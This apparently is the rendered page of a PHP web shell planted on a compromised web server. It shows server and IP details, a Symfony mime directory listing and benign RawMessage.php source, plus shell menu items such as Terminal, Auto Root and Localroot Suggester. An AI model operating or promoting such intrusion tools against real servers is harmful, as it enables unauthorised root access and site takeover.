Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
vendor /
symfony /
mime /
Delete
Unzip
Name
Size
Permission
Date
Action
Crypto
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
DependencyInjection
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Encoder
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Exception
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Header
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
HtmlToTextConverter
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Part
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Resources
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Test
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
Address.php
3.63
KB
-rwxrwxr-x
2026-03-30 09:31
BodyRendererInterface.php
418
B
-rwxrwxr-x
2026-03-30 09:31
CHANGELOG.md
935
B
-rwxrwxr-x
2026-03-30 09:31
CharacterStream.php
9.15
KB
-rwxrwxr-x
2026-03-30 09:31
DraftEmail.php
1.1
KB
-rwxrwxr-x
2026-03-30 09:31
Email.php
15.33
KB
-rwxrwxr-x
2026-03-30 09:31
FileBinaryMimeTypeGuesser.php
2.18
KB
-rwxrwxr-x
2026-03-30 09:31
FileinfoMimeTypeGuesser.php
1.75
KB
-rwxrwxr-x
2026-03-30 09:31
LICENSE
1.04
KB
-rwxrwxr-x
2026-03-30 09:31
Message.php
4.59
KB
-rwxrwxr-x
2026-03-30 09:31
MessageConverter.php
5.04
KB
-rwxrwxr-x
2026-03-30 09:31
MimeTypeGuesserInterface.php
826
B
-rwxrwxr-x
2026-03-30 09:31
MimeTypes.php
195.72
KB
-rwxrwxr-x
2026-03-30 09:31
MimeTypesInterface.php
777
B
-rwxrwxr-x
2026-03-30 09:31
README.md
459
B
-rwxrwxr-x
2026-03-30 09:31
RawMessage.php
2.63
KB
-rwxrwxr-x
2026-03-30 09:31
composer.json
1.49
KB
-rwxrwxr-x
2026-03-30 09:31
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Mime; use Symfony\Component\Mime\Exception\LogicException; /** * @author Fabien Potencier <fabien@symfony.com> */ class RawMessage { /** @var iterable<string>|string|resource */ private $message; private bool $isGeneratorClosed; /** * @param iterable<string>|string|resource $message */ public function __construct(mixed $message) { $this->message = $message; } public function __destruct() { if (\is_resource($this->message)) { fclose($this->message); } } public function toString(): string { if (\is_string($this->message)) { return $this->message; } if (\is_resource($this->message)) { return stream_get_contents($this->message, -1, 0); } $message = ''; foreach ($this->message as $chunk) { $message .= $chunk; } return $this->message = $message; } public function toIterable(): iterable { if ($this->isGeneratorClosed ?? false) { trigger_deprecation('symfony/mime', '6.4', 'Sending an email with a closed generator is deprecated and will throw in 7.0.'); // throw new LogicException('Unable to send the email as its generator is already closed.'); } if (\is_string($this->message)) { yield $this->message; return; } if (\is_resource($this->message)) { rewind($this->message); while ($line = fgets($this->message)) { yield $line; } return; } if ($this->message instanceof \Generator) { $message = fopen('php://temp', 'w+'); foreach ($this->message as $chunk) { fwrite($message, $chunk); yield $chunk; } $this->isGeneratorClosed = !$this->message->valid(); $this->message = $message; return; } foreach ($this->message as $chunk) { yield $chunk; } } /** * @return void * * @throws LogicException if the message is not valid */ public function ensureValidity() { } public function __serialize(): array { return [$this->toString()]; } public function __unserialize(array $data): void { [$this->message] = $data; } }